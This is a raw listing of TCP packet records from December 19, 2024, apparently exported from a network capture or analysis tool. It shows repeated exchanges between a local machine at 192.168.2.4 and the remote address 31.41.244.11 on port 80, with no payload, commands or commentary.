                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.174794912 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.174822092 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.175038099 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.179101944 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.179187059 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.179259062 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.179337978 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.183522940 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.183624983 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.183703899 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.183703899 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.187905073 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.187954903 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.188002110 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.188097954 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.192420959 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.192517996 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.192554951 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.192554951 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.196772099 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.196882010 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.196922064 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.196963072 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.201252937 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.201308012 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.201356888 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.201415062 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.205648899 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.205702066 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.205715895 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.205780983 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.210057974 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.210146904 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.210163116 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.210339069 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.213557005 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.213655949 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.213661909 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.213704109 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.217041969 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.217080116 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.217148066 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.217186928 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.220540047 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.220627069 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.220653057 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.220699072 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.224004984 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.224045992 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.224116087 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.224169016 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.227538109 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.227579117 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.227655888 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.227734089 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.230998993 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.231041908 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.231192112 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.231331110 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.234472990 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.234539032 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.234585047 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.234668970 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.238023043 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.238073111 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.238151073 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.238210917 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.345808029 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.345849037 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.345868111 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.345910072 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.347206116 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.347333908 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.347342968 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.347385883 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.349833012 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.350030899 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.350831985 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.350884914 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.350936890 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.351119041 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.353550911 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.353631020 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.353657961 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.353754044 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.356213093 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.356312037 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.356333971 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.356362104 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.358768940 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.358845949 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.358855963 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.358916998 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.361326933 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.361382961 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.361442089 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.361485958 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.363831997 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.363935947 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.363970041 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.363970041 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.366234064 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.366297007 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.366362095 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.366426945 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.368737936 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.368758917 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.368911982 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.368911982 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.371125937 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.371201992 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.371242046 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.371323109 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.373554945 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.373622894 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.373703957 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.373735905 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.376003981 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.376070023 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.376101017 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.376261950 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.378427982 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.378500938 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.378541946 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.378628969 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.380856991 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.380956888 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.380984068 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.381014109 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.383291960 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.383349895 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.383424044 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.383513927 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.385775089 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.385860920 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.385878086 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.385900974 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.388178110 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.388228893 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.388276100 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.388353109 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.390608072 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.390680075 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.390816927 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.390816927 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.393012047 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.393085957 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.393107891 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.393188000 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.395486116 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.395513058 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.395548105 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.395548105 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.397886038 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.397974014 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.397985935 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.398104906 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.400324106 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.400454998 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.400474072 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.400538921 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.402774096 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.402816057 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.402867079 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.402944088 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.405194998 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.405303001 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.405333042 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.405394077 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.407624960 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.407686949 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.407752991 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.407799959 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.410052061 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.410156012 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.410175085 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.410228968 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.412497997 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.412600994 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.412606955 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.412667990 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.414968014 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.415025949 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.415077925 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.415128946 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.417371035 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.417433023 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.417495966 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.417619944 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.419796944 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.419884920 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.419967890 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.420022964 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.422278881 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.422327042 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.422429085 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.422492027 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.424659967 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.424738884 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.424782991 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.424830914 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.427109003 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.427232027 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.427249908 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.427297115 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.429564953 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.429605961 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.429653883 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.429691076 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.431948900 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.432065010 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.537863016 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.537945986 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.537952900 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.538002014 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.538894892 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.538950920 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.539004087 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.539052010 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.540950060 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.541018009 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.541023016 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.541147947 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.543006897 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.543066978 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.543144941 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.543303967 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.545073032 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.545123100 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.545164108 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.545298100 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.547110081 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.547220945 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.547250032 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.547293901 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.549073935 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.549127102 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.549187899 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.549263000 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.551024914 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.551129103 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.551131010 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.551249981 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.553505898 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.553590059 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.553622007 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.553709984 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.554877043 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.554989100 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.554990053 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.555224895 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.556762934 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.556843996 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.556878090 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.556992054 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.558693886 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.558765888 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.558769941 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.558804989 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.560527086 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.560616970 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.560688019 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.560688019 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.562452078 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.562510014 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.562550068 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.562604904 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.564300060 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.564352989 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.564456940 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.564558029 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.566183090 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.566245079 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.566292048 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.566386938 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.568063021 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:50.568172932 CET4986080192.168.2.431.41.244.11
